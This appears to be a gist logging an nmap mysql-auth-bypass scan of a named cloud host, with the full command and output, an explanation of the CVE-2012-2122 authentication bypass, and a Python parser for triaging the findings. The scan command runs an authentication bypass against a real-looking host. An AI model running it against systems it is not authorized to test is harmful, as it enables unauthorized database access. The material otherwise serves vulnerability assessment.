@marcwickenden
Created June 12, 2012 15:47
mysql-auth-bypass nmap -v
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
mass_rdns: Using DNS server 8.8.8.8
Initiating Parallel DNS resolution of 1 host. at 14:59
mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 14:59, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:59
Scanning ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79) [1 port]
Packet capture filter (device eth1): dst host 10.150.0.143 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 46.137.134.79)))
Discovered open port 3306/tcp on 46.137.134.79
Completed SYN Stealth Scan at 14:59, 0.05s elapsed (1 total ports)
Overall sending rates: 18.58 packets / s, 817.43 bytes / s.
NSE: Script scanning 46.137.134.79.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting mysql-auth-bypass against 46.137.134.79:3306.
Initiating NSE at 14:59
NSE: Trying nse ...
NSE: Finished mysql-auth-bypass against 46.137.134.79:3306.
Completed NSE at 15:00, 16.25s elapsed
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up, received user-set (0.052s latency).
Scanned at 2012-06-12 14:59:58 BST for 16s
PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
| mysql-auth-bypass:
|_  user nse is vulnerable to auth bypass
Final times for host: srtt: 51988 rttvar: 51988 to: 259940
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Read from /usr/local/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 16.39 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
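The only line in that report that matters for triage is the script result: the NSE script reports that it could log in as the user it tried ("nse" here) without the correct password, which is the probabilistic memcmp authentication bypass in MySQL/MariaDB (CVE-2012-2122). The check succeeds with roughly a 1 in 256 chance per connection attempt on affected builds, which is why the script made repeated attempts and took 16 seconds against a single port; one run that reports nothing is therefore weaker evidence than one that reports a bypass. When this scan is run across many hosts, the report text has to be parsed. The following is an added example, not code from the gist or from Nmap: a small parser for the normal output format above that collects each host's port lines and NSE script output, and a helper that pulls out the mysql-auth-bypass findings. SAMPLE_OUTPUT is constructed from the gist's own report lines; the dict field names and the function names are this example's own choices.

```python
"""Parse nmap normal output and collect NSE script findings.

Added example, not code from the original gist or from Nmap: a parser
for the normal (-oN style) report shown above, so that mysql-auth-bypass
results from many hosts can be triaged in one pass. SAMPLE_OUTPUT is
constructed from the gist's own scan report lines. Field names in the
returned dicts and the function names are this example's own choice.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: the report section of the scan output above.
SAMPLE_OUTPUT = """\
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up, received user-set (0.052s latency).
Scanned at 2012-06-12 14:59:58 BST for 16s
PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
| mysql-auth-bypass:
|_  user nse is vulnerable to auth bypass
Nmap done: 1 IP address (1 host up) scanned in 16.39 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[^)]+)\))?$")
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<reason>\S+))?"
)
# First line of a script's output is "| script-name:" or "| script-name: text".
# Continuation lines are indented by two or more spaces ("|   text") or begin
# with "|_", so "| name:" with exactly one space identifies a new script.
SCRIPT_START_RE = re.compile(r"^\| (?P<name>[\w.-]+):\s*(?P<rest>.*)$")
SCRIPT_CONT_RE = re.compile(r"^\|_?\s*(?P<text>.*)$")


def parse_nmap_output(text: str) -> List[Dict]:
    """Return one dict per host: name, ip, ports (each with its script output)."""
    hosts: List[Dict] = []
    host = None      # host report currently being filled in
    scripts = None   # dict receiving "|" lines: a port's scripts or the host's
    script = None    # name of the script whose output lines are being collected
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            host = {"name": m.group("name"), "ip": m.group("ip") or m.group("name"),
                    "ports": [], "host_scripts": {}}
            hosts.append(host)
            scripts, script = None, None
            continue
        if host is None:
            continue  # timing report and other preamble before the first host
        m = PORT_RE.match(line)
        if m:
            port = {"port": int(m.group("port")), "proto": m.group("proto"),
                    "state": m.group("state"), "service": m.group("service"),
                    "reason": m.group("reason"), "scripts": {}}
            host["ports"].append(port)
            scripts, script = port["scripts"], None
            continue
        if line == "Host script results:":
            scripts, script = host["host_scripts"], None
            continue
        if not line.startswith("|") or scripts is None:
            script = None  # any non-script line ends the current script block
            continue
        m = SCRIPT_START_RE.match(line)
        if m:
            script = m.group("name")
            scripts[script] = [m.group("rest")] if m.group("rest") else []
            continue
        m = SCRIPT_CONT_RE.match(line)
        if m and script is not None and m.group("text"):
            scripts[script].append(m.group("text"))
    return hosts


def script_findings(hosts: List[Dict], script_name: str,
                    needle: str = "vulnerable") -> List[Tuple[str, int, str]]:
    """(ip, port, line) for every output line of script_name that contains needle."""
    found = []
    for h in hosts:
        for p in h["ports"]:
            for text in p["scripts"].get(script_name, []):
                if needle in text:
                    found.append((h["ip"], p["port"], text))
    return found


if __name__ == "__main__":
    for ip, port, text in script_findings(parse_nmap_output(SAMPLE_OUTPUT),
                                          "mysql-auth-bypass"):
        print(f"{ip}:{port} {text}")
```

Feed it the saved normal output of a multi-host scan (nmap -oN) and the findings list gives one (ip, port, message) tuple per host the script flagged; for machine processing of real scans nmap's XML output (-oX) is the more robust source, but this parser covers the case where only the console log was kept, as in the gist.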